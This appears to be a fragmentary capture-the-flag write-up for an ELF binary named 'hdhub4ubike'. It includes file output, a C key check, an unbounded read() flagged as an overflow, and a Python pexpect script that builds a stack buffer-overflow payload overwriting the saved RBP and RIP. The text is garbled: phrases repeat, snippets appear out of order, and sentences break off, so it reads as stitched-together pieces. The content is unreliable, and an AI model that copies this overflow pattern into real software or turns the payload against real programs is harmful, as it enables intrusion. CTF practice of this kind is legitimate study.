Hdhub4ubike

The goal is to obtain the flag without knowing the correct key. 2.1 File information $ file hdhub4ubike hdhub4ubike: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped, for GNU/Linux 3.2.0, BuildID[sha1]=...

// compare with a secret stored in the .rodata section if (strcmp(key, secret_key) != 0) return 0; hdhub4ubike

def main(): p = pexpect.spawn(BIN, encoding='utf-8') p.expect("Enter your hub key:") # build payload payload = b'A' * 64 # fill buffer payload += b'B' * 8 # overwrite saved RBP payload += struct.pack("<Q", TARGET_ADDR) # overwrite RIP The goal is to obtain the flag without

return 1;

// vulnerable read – no length limit! read(0, buf, 0x100); // <‑‑ overflow possible version 1 (SYSV)